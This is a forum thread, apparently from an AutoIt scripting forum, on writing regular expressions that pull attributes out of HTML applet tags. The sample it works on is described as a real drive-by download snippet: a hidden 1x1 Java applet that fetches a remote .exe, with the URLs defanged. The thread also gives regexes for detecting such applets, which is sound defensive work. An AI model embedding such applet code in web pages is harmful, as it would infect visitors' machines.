Regex for applet


hello,

I need help in generating a single regex for the following.

<body>
<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" code="ScriptEngineExp.class" width="1" height="1">
<param name="data" value="h__p://www.w______y.com/userfiles/file/Applet19.exe"/>
</applet>
</body>

I am presently using four different regexes on the string above, starting at applet archive. I need to retrieve the URL, code, width and height.

Secondly, there can be multiple applets, so I extract the text from <applet to </applet> and then run the four regex statements on it.

applet_archive= (?i)(?:<[\s*]{0,1}applet[^>]*)archive[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)
applet_class= (?i)(?:<[\s*]{0,1}applet[^>]*)code[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)
applet_width= (?i)(?:<[\s*]{0,1}applet[^>]*)width[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)
applet_height= (?i)(?:<[\s*]{0,1}applet[^>]*)height[\s*]?=[\s*]?["']{0,1}(.*?)['"]{0,1}(?: |>|\s)
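
One possible way to fold the four patterns into a single one is to give each attribute its own lookahead inside the <applet ...> tag, so the order of the attributes does not matter. This is only a sketch under some assumptions: values contain no spaces, quotes or >, and a tag that lacks any of the four attributes is skipped. The variable names and the second applet in the sample are made up for illustration.

```autoit
; Sample input: the applet from this post plus a second, made-up applet
; with the attributes in a different order and without quotes.
Local $sHtml = '<body>' & @CRLF & _
        '<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" code="ScriptEngineExp.class" width="1" height="1">' & @CRLF & _
        '</applet>' & @CRLF & _
        '<applet height=200 width=300 code=Clock.class archive=clock.jar>' & @CRLF & _
        '</applet>' & @CRLF & _
        '</body>'

; \x22 is " and \x27 is ', so the opening quote is optional and may be either kind.
Local $sQuote = '[\x22\x27]?'

; One lookahead per attribute; each one scans the tag up to its closing >.
Local $sPattern = '(?i)<applet\b' & _
        '(?=[^>]*\barchive\s*=\s*' & $sQuote & '([^\x22\x27\s>]+))' & _
        '(?=[^>]*\bcode\s*=\s*' & $sQuote & '([^\x22\x27\s>]+))' & _
        '(?=[^>]*\bwidth\s*=\s*' & $sQuote & '(\d+))' & _
        '(?=[^>]*\bheight\s*=\s*' & $sQuote & '(\d+))'

; Flag 3 returns the captures of all matches in one flat array:
; four elements (archive, code, width, height) per applet tag.
Local $aHits = StringRegExp($sHtml, $sPattern, 3)
If @error Then
    ConsoleWrite('No applet tag with all four attributes found' & @CRLF)
Else
    For $i = 0 To UBound($aHits) - 4 Step 4
        ConsoleWrite('archive: ' & $aHits[$i] & @CRLF & _
                'class:   ' & $aHits[$i + 1] & @CRLF & _
                'width:   ' & $aHits[$i + 2] & @CRLF & _
                'height:  ' & $aHits[$i + 3] & @CRLF & @CRLF)
    Next
EndIf
```

Because the pattern runs over the whole page, there is no need to cut out each <applet ... </applet> block first.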

Are the parameters always the same?

#include<Array.au3>
$str = '<body>' & @CRLF & _
'<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" code="ScriptEngineExp.class" width="1" height="1">' & @CRLF & _
'<param name="data" value="h__p://www.w______y.com/userfiles/file/Applet19.exe"/>' & @CRLF & _
'</applet>' & @CRLF & _
'</body>'
; Flag 3 returns every capture from every match, i.e. each double-quoted value
$re = StringRegExp($str, '"(.*?)"', 3)
_ArrayDisplay($re)


Or even something like this:

#include<Array.au3>
$str = '<body>' & @CRLF & _
  '<applet archive="h__p://www.w______y.com/userfiles/file/Applet.jar" code="ScriptEngineExp.class" width="1" height="1">' & @CRLF & _
  '<param name="data" value="h__p://www.w______y.com/userfiles/file/Applet19.exe"/>' & @CRLF & _
  '</applet>' & @CRLF & _
  '</body>'
ConsoleWrite(StringRegExpReplace($str, '(?s).*archive="(.*?)".*code="(.*?)".*width="(\d+)".*height="(\d+)".*', 'archive: $1' & @CRLF & 'class: $2' & @CRLF & 'width: $3' & @CRLF & 'height: $4') & @LF)


deltarocked,

I am trying to get regexp so thought I would take a whack at this. I came up with the following:

StringRegExp($Value, 'archive="(.*?)"|code="(.*?)"|width="(.*?)"|height="(.*?)"', 3)
However, it returns an array with blank elements between the results that I expect. I hope this helps, and that one of the regex mavens will enlighten us (jeez, watching too much television).

kylomas

edit: additional data

I'm using the regex tester by szhlopp found at http://www.autoitscript.com/forum/topic/...ester-v2/page__view__findpost_

edit2: figured out that the problem is the space delimiting the pattern but do NOT know how to NOT return the space as a match
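
On the blank elements: as far as I can tell, they come from each alternative having its own capturing group. When a later branch such as code= matches, the groups that belong to the earlier branches take no part in the match and are reported as empty strings. A possible workaround, sketched below, is to move the attribute names into a non-capturing group so that all four share one capturing group. The shortened $sTag is only test data.

```autoit
#include <Array.au3>

; Test data: a shortened version of the applet tag from the first post.
Local $sTag = '<applet archive="Applet.jar" code="ScriptEngineExp.class" width="1" height="1">'

; (?:...) groups the attribute names without capturing them, so the only
; capturing group is the value between the double quotes.
Local $aValues = StringRegExp($sTag, '(?i)\b(?:archive|code|width|height)="(.*?)"', 3)
If @error Then
    ConsoleWrite('No attributes found' & @CRLF)
Else
    ; One element per attribute, in the order they appear in the tag.
    _ArrayDisplay($aValues)
EndIf
```

The values come back in document order, so this does not tell you which attribute each value belongs to if the order can vary.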


In this case the 'or' | is not appropriate. You should use wildcards between the parts to be captured.

Like this

$aResult=StringRegExp($str, 'archive="([^"]*).*code="([^"]*).*width="([^"]*).*height="([^"]*)', 3)

or this

$aResult=StringRegExp($str, 'archive="(.*?)".*code="(.*?)".*width="(.*?)".*height="(.*?)"', 3)


Apologies to deltarocked for intruding...

@Bowmore,

When I use pattern #2 it works perfectly. However, when I do this

archive=(.*?).*code=(.*?).*width=(.*?)
intending to get the same strings including the quotes, I get two blank elements and a match on the third. ???

kylomas

edit: I think this is because I do NOT have a terminating delimiter, but how to include the quotes and use the quotes as the terminator?

edit2: got it by doing this

archive=(".*?").*code=(".*?")

Also, don't leave out a question mark where one is needed. It doesn't matter in this particular case, but it is worth knowing.

You see, by default, PCRE is "greedy", which means that an unlimited repetition (+ or * or {n,}) will match the longest string possible. This is particularly important when .* is used.

E.g. the pattern '(.*)abc' applied to 'xxxxxxxxxxxxxabcyyyyyyyyyyyyyyyyyabczzzzzz'

matches 'xxxxxxxxxxxxxabcyyyyyyyyyyyyyyyyyabc'

In other terms, PCRE makes .* match the longest string that still doesn't cause the rest of the pattern to fail.

Now use a non-greedy pattern by applying the ? qualifier (which is not the same as the ? "optional" modifier, a synonym of {0,1}) and things change:

the pattern '(.*?)abc' applied to 'xxxxxxxxxxxxxabcyyyyyyyyyyyyyyyyyabczzzzzz' matches 'xxxxxxxxxxxxxabc'

that is the shortest string that still doesn't cause the rest of the pattern to fail.

So in the above post, when you have archive=(".*?").*code=(".*?") you rely on the line not having more than one occurrence of code=.

Else you find yourself in situation 1 above (too greedy). This in fact may happen since line breaks between html markup are completely unimportant and there may be none or many.
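
The greedy and non-greedy examples above can be checked with a few lines of script. This is just a sketch; it uses flag 2 so that element [0] of the returned array holds the whole match, and the variable names are arbitrary.

```autoit
Local $sSubject = 'xxxxxxxxxxxxxabcyyyyyyyyyyyyyyyyyabczzzzzz'

; Flag 2 returns [0] = the whole match, [1] = the first capturing group.
Local $aGreedy = StringRegExp($sSubject, '(.*)abc', 2)
Local $aLazy = StringRegExp($sSubject, '(.*?)abc', 2)

; Greedy: .* runs to the last 'abc' in the subject.
ConsoleWrite('greedy: ' & $aGreedy[0] & @CRLF) ; xxxxxxxxxxxxxabcyyyyyyyyyyyyyyyyyabc

; Non-greedy: .*? stops at the first 'abc'.
ConsoleWrite('lazy:   ' & $aLazy[0] & @CRLF) ; xxxxxxxxxxxxxabc
```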


hello everybody,

A little bit of history about this snippet: it is actual working drive-by download HTML code. All drive-by downloads that are based on Java have the same syntax, but nothing can be said about the positions of the attributes or about the line feeds or spaces between them.

code="ScriptEngineExp.class" width="1" height="1"

These three parameters are a giveaway that this is malicious code.

Logical reasoning: width and height are the dimensions the user sees, so they would not be 1, or anything less than 50, unless the intent is malicious.

ScriptEngineExp.class is a Java class which executes commands. :)

The individual regexes I have written essentially cover all the tricks used by hackers, so that each one returns the exact value irrespective of ", ' or no quotes, because any of these can be used in HTML and it is still parsed.

Thanks again for the efforts and the discussion.

Regards

Deltarocked
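
The size heuristic described above could be scripted roughly as follows. It is a sketch, not a finished detector: _AttrValue is a hypothetical helper, the second applet in the sample is made up as a harmless counter-example, and the threshold of 50 is simply the figure mentioned in the post.

```autoit
; Hypothetical helper: returns the value of attribute $sName inside one tag,
; or '' with @error set if the attribute is missing. Quotes are optional.
Func _AttrValue($sTag, $sName)
    Local $aMatch = StringRegExp($sTag, '(?i)\b' & $sName & '\s*=\s*[\x22\x27]?([^\x22\x27\s>]+)', 1)
    If @error Then Return SetError(1, 0, '')
    Return $aMatch[0]
EndFunc   ;==>_AttrValue

; Sample page: one tiny applet without quotes and one normal-sized applet.
Local $sHtml = '<applet archive="Applet.jar" code="ScriptEngineExp.class" width=1 height=1></applet>' & @CRLF & _
        '<applet code="Clock.class" width="300" height="200"></applet>'

; Collect every opening <applet ...> tag, then inspect each one separately.
Local $aTags = StringRegExp($sHtml, '(?i)(<applet\b[^>]*>)', 3)
If @error Then
    ConsoleWrite('No applet tags found' & @CRLF)
Else
    Local $sWidth, $sHeight
    For $i = 0 To UBound($aTags) - 1
        $sWidth = _AttrValue($aTags[$i], 'width')
        $sHeight = _AttrValue($aTags[$i], 'height')
        If $sWidth = '' Or $sHeight = '' Then ContinueLoop
        ; Flag applets that are too small for a user to see.
        If Number($sWidth) < 50 And Number($sHeight) < 50 Then
            ConsoleWrite('Suspicious applet, code=' & _AttrValue($aTags[$i], 'code') & @CRLF)
        EndIf
    Next
EndIf
```

With the sample above, only the ScriptEngineExp.class applet is reported.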


Try this one

(?i)code=[\x22\x27]?script.+?\.class[\x22\x27]?\s*width=[\x22\x27]?\d[\x22\x27]?\s*height=[\x22\x27]?\d[\x22\x27]?

I could probably shorten it down but it should work as is.

George
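
A quick way to try a detection pattern like this from a script: with no flag, StringRegExp returns 1 on a match and 0 otherwise. The pattern in the sketch is written with explicit backslash escapes (\x22, \x27, \s, \d, \.), which is my reading of what was intended, and the two test strings are assumptions for illustration.

```autoit
; Detection pattern with explicit escapes: optional " or ' around each value,
; a class name starting with "script", and single-digit width and height.
Local $sPattern = '(?i)code=[\x22\x27]?script.+?\.class[\x22\x27]?\s*width=[\x22\x27]?\d[\x22\x27]?\s*height=[\x22\x27]?\d[\x22\x27]?'

Local $sTiny = '<applet archive="Applet.jar" code="ScriptEngineExp.class" width="1" height="1">'
Local $sTwoDigits = '<applet archive="Applet.jar" code="ScriptEngineExp.class" width="10" height="10">'

; Default flag (0): 1 = match, 0 = no match.
ConsoleWrite(StringRegExp($sTiny, $sPattern) & @CRLF) ; 1
ConsoleWrite(StringRegExp($sTwoDigits, $sPattern) & @CRLF) ; 0, because \d matches only one digit
```

Note that the pattern also expects code, width and height in exactly that order; to catch sizes such as 10, \d would need to become something like \d{1,2}.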
